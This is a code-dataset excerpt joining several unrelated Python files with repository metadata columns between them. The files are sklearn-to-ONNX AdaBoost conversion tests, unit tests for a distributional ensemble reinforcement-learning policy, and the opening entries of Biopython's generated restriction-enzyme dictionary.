model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=5, algorithm="SAMME", random_state=42,
base_estimator=DecisionTreeClassifier(
max_depth=6, random_state=42)), 2)
model_onnx = convert_sklearn(
model,
"AdaBoostClSamme",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMEDT",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"< StrictVersion('0.5.0')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme_decision_function(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=5, algorithm="SAMME", random_state=42,
base_estimator=DecisionTreeClassifier(
max_depth=6, random_state=42)), 2)
options = {id(model): {'raw_scores': True}}
model_onnx = convert_sklearn(
model,
"AdaBoostClSamme",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10,
options=options,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMEDTDecisionFunction",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"< StrictVersion('0.5.0')",
methods=['predict', 'decision_function_binary'],
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_lr(self):
model, X_test = fit_classification_model(
AdaBoostClassifier(learning_rate=0.3, random_state=42), 3,
is_int=True)
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", Int64TensorType((None, X_test.shape[1])))],
target_opset=10
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierLR",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_bool(self):
model, X_test = fit_classification_model(
AdaBoostClassifier(random_state=42), 3,
is_bool=True)
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", BooleanTensorType((None, X_test.shape[1])))],
target_opset=10,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierBool",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor(self):
model, X = fit_regression_model(
AdaBoostRegressor(n_estimators=5))
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=10)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressor-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_lreg(self):
model, X = fit_regression_model(
AdaBoostRegressor(n_estimators=5,
base_estimator=LinearRegression()))
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=10)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorLReg-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_int(self):
model, X = fit_regression_model(
AdaBoostRegressor(n_estimators=5), is_int=True)
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", Int64TensorType([None, X.shape[1]]))],
target_opset=10)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorInt-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_lr10(self):
model, X = fit_regression_model(
AdaBoostRegressor(learning_rate=0.5, random_state=42))
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=10)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorLR-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
verbose=False
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnxruntime.__version__) <
StrictVersion("0.5.9999")),
reason="not available")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_lr11(self):
model, X = fit_regression_model(
AdaBoostRegressor(learning_rate=0.5, random_state=42))
if onnx_opset_version() < 11:
try:
convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))])
except RuntimeError:
return
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorLR-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.9999') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
verbose=False
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_bool(self):
model, X = fit_regression_model(
AdaBoostRegressor(learning_rate=0.5, random_state=42),
is_bool=True)
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", BooleanTensorType([None, X.shape[1]]))],
target_opset=10,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorBool",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
verbose=False,
)
if __name__ == "__main__":
unittest.main()
| 37.989744 | 72 | 0.575459 | 1,365 | 14,816 | 5.903297 | 0.098901 | 0.043559 | 0.05659 | 0.087242 | 0.845619 | 0.842144 | 0.833954 | 0.828866 | 0.815463 | 0.762472 | 0 | 0.021761 | 0.31763 | 14,816 | 389 | 73 | 38.087404 | 0.775272 | 0.002362 | 0 | 0.732432 | 0 | 0 | 0.182556 | 0.09324 | 0 | 0 | 0 | 0 | 0.035135 | 1 | 0.035135 | false | 0 | 0.032432 | 0 | 0.072973 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4b6bbf7858dfd7d4372a2f3ac35840bbf24f4b2 | 3,800 | py | Python | tests/test_distributional_ensemble_policy.py | carljohanhoel/EnsembleQuantileNetworks | 7dfbed562f3e0c7552fa98a821db502ea565618c | [
"MIT"
] | 9 | 2021-05-29T14:55:27.000Z | 2022-03-08T11:19:44.000Z | tests/test_distributional_ensemble_policy.py | carljohanhoel/EnsembleQuantileNetworks | 7dfbed562f3e0c7552fa98a821db502ea565618c | [
"MIT"
] | 1 | 2021-09-27T08:59:43.000Z | 2022-01-13T14:13:03.000Z | tests/test_distributional_ensemble_policy.py | carljohanhoel/EnsembleQuantileNetworks | 7dfbed562f3e0c7552fa98a821db502ea565618c | [
"MIT"
] | 1 | 2022-02-03T14:17:36.000Z | 2022-02-03T14:17:36.000Z | import unittest
import numpy as np
import sys
sys.path.append('../src')
from policy import DistributionalEnsembleTestPolicy
class Tester(unittest.TestCase):
def test_standard(self):
policy = DistributionalEnsembleTestPolicy()
for i in range(0, 100):
z_values_all_nets = np.random.rand(10, 32, 4)
z_values_all_nets[:, :, 0] += 1 # Action 0 should then be 'best'
action, policy_info = policy.select_action(z_values_all_nets=z_values_all_nets)
self.assertEqual(action, 0)
# Test for batch
z_values_all_nets = np.random.rand(32, 10, 32, 4)
best_idx = np.random.randint(0, 4, 32)
for batch in range(0, 32):
idx = best_idx[batch]
z_values_all_nets[batch, :, :, idx] += 1
action, policy_info = policy.select_action(z_values_all_nets=z_values_all_nets)
self.assertTrue((action == best_idx).all())
def test_safe_policy(self):
policy = DistributionalEnsembleTestPolicy(aleatoric_threshold=0.1)
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[..., 2] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[0:5, :, 2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[:, 0:10, 2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 4)
self.assertTrue(policy_info['safe_action'])
policy = DistributionalEnsembleTestPolicy(epistemic_threshold=0.1)
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[..., 2] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[:, 0:10, 2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[0:5, :, :2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 4)
self.assertTrue(policy_info['safe_action'])
policy = DistributionalEnsembleTestPolicy(aleatoric_threshold=0.1, epistemic_threshold=0.1)
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[..., 2] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[:, 0:10, 2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 4)
self.assertTrue(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[0:5, :, :2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 4)
self.assertTrue(policy_info['safe_action'])
if __name__ == '__main__':
unittest.main()
| 40 | 99 | 0.645263 | 535 | 3,800 | 4.24486 | 0.11215 | 0.126376 | 0.180537 | 0.252752 | 0.837517 | 0.825627 | 0.796125 | 0.765742 | 0.756935 | 0.756935 | 0 | 0.059447 | 0.229737 | 3,800 | 94 | 100 | 40.425532 | 0.716433 | 0.011842 | 0 | 0.675325 | 0 | 0 | 0.030117 | 0 | 0 | 0 | 0 | 0 | 0.25974 | 1 | 0.025974 | false | 0 | 0.051948 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d4d5d9df6497b27b3f1c637c5fe8bb3e160a1542 | 538,893 | py | Python | Bio/Restriction/Restriction_Dictionary.py | gtsueng/biopython | 4b2adc9f52ae1eda123744a8f4af7c2150505de1 | [
"BSD-3-Clause"
] | 2 | 2020-08-25T13:55:00.000Z | 2020-08-25T16:36:03.000Z | Bio/Restriction/Restriction_Dictionary.py | gtsueng/biopython | 4b2adc9f52ae1eda123744a8f4af7c2150505de1 | [
"BSD-3-Clause"
] | 1 | 2020-04-25T20:36:07.000Z | 2020-04-25T20:36:07.000Z | site-packages/Bio/Restriction/Restriction_Dictionary.py | Wristlebane/Pyto | 901ac307b68486d8289105c159ca702318bea5b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright (C) 2004. Frederic Sohm.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
# This file is automatically generated - do not edit it by hand! Instead,
# use the tool Scripts/Restriction/ranacompiler.py which in turn uses
# Scripts/Restriction/rebase_update.py and Bio/Restriction/RanaConfig.py
"""Restriction Analysis Libraries.
The following dictionaries used to be defined in one go, but that does
not work on Jython due to JVM limitations. Therefore we break this up
into steps, using temporary functions to avoid the JVM limits.
Used REBASE emboss files version 905 (2019).
"""
rest_dict = {}
def _temp():
return {
'charac': (3, -3, None, None, 'TTATAA'),
'compsite': '(?=(?P<AanI>TTATAA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTATAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AanI'] = _temp()
def _temp():
return {
'charac': (11, 8, None, None, 'CACCTGC'),
'compsite': '(?=(?P<AarI>CACCTGC))|(?=(?P<AarI_as>GCAGGTG))',
'dna': None,
'freq': 16384.0,
'fst3': 8,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACCTGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AarI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GACNNNNNNGTC'),
'compsite': '(?=(?P<AasI>GAC......GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNNGTC',
'size': 12,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AasI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GACGTC'),
'compsite': '(?=(?P<AatII>GACGTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'ACGT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'K', 'M', 'N', 'V'),
}
rest_dict['AatII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRRTAAG'),
'compsite': '(?=(?P<Aba6411II>C[AG][AG]TAAG))|(?=(?P<Aba6411II_as>CTTA[CT][CT]G))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRRTAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Aba6411II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CATTAG'),
'compsite': '(?=(?P<AbaB8342IV>CATTAG))|(?=(?P<AbaB8342IV_as>CTAATG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATTAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AbaB8342IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTATCAV'),
'compsite': '(?=(?P<AbaCIII>CTATCA[ACG]))|(?=(?P<AbaCIII_as>[CGT]TGATAG))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTATCAV',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AbaCIII'] = _temp()
def _temp():
return {
'charac': (12, 9, None, None, 'C'),
'compsite': '(?=(?P<AbaSI>C))|(?=(?P<AbaSI_as>G))',
'dna': None,
'freq': 4.0,
'fst3': 9,
'fst5': 12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'C',
'size': 1,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AbaSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'YCCGSS'),
'compsite': '(?=(?P<AbaUMB2I>[CT]CCG[CG][CG]))|(?=(?P<AbaUMB2I_as>[CG][CG]CGG[AG]))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'YCCGSS',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AbaUMB2I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTCGAGG'),
'compsite': '(?=(?P<AbsI>CCTCGAGG))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTCGAGG',
'size': 8,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AbsI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGCGCA'),
'compsite': '(?=(?P<Acc16I>TGCGCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCGCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Acc16I'] = _temp()
def _temp():
return {
'charac': (10, 8, None, None, 'ACCTGC'),
'compsite': '(?=(?P<Acc36I>ACCTGC))|(?=(?P<Acc36I_as>GCAGGT))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCTGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Acc36I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTACC'),
'compsite': '(?=(?P<Acc65I>GGTACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTACC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'N', 'V'),
}
rest_dict['Acc65I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GACGCA'),
'compsite': '(?=(?P<Acc65V>GACGCA))|(?=(?P<Acc65V_as>TGCGTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Acc65V'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<AccB1I>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AccB1I'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCANNNNNTGG'),
'compsite': '(?=(?P<AccB7I>CCA.....TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNTGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AccB7I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CCGCTC'),
'compsite': '(?=(?P<AccBSI>CCGCTC))|(?=(?P<AccBSI_as>GAGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AccBSI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTMKAC'),
'compsite': '(?=(?P<AccI>GT[AC][GT]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'MK',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTMKAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'Q', 'R', 'X'),
}
rest_dict['AccI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<AccII>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('J', 'K'),
}
rest_dict['AccII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<AccIII>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'R'),
}
rest_dict['AccIII'] = _temp()
def _temp():
return {
'charac': (13, 11, None, None, 'CAGCTC'),
'compsite': '(?=(?P<AceIII>CAGCTC))|(?=(?P<AceIII_as>GAGCTG))',
'dna': None,
'freq': 4096.0,
'fst3': 11,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AceIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCCAG'),
'compsite': '(?=(?P<AchA6III>AGCCAG))|(?=(?P<AchA6III_as>CTGGCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AchA6III'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGC'),
'compsite': '(?=(?P<AciI>CCGC))|(?=(?P<AciI_as>GCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AciI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AACGTT'),
'compsite': '(?=(?P<AclI>AACGTT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AACGTT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['AclI'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GGATC'),
'compsite': '(?=(?P<AclWI>GGATC))|(?=(?P<AclWI_as>GATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AclWI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCRGAG'),
'compsite': '(?=(?P<Aco12261II>CC[AG]GAG))|(?=(?P<Aco12261II_as>CTC[CT]GG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCRGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Aco12261II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'YGGCCR'),
'compsite': '(?=(?P<AcoI>[CT]GGCC[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YGGCCR',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AcoI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TAGCRAB'),
'compsite': '(?=(?P<AcoY31II>TAGC[AG]A[CGT]))|(?=(?P<AcoY31II_as>[ACG]T[CT]GCTA))',
'dna': None,
'freq': 2730.6666666666665,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TAGCRAB',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AcoY31II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RAATTY'),
'compsite': '(?=(?P<AcsI>[AG]AATT[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RAATTY',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AcsI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGAAG'),
'compsite': '(?=(?P<AcuI>CTGAAG))|(?=(?P<AcuI_as>CTTCAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['AcuI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<AcvI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['AcvI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<AcyI>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J',),
}
rest_dict['AcyI'] = _temp()
def _temp():
return {
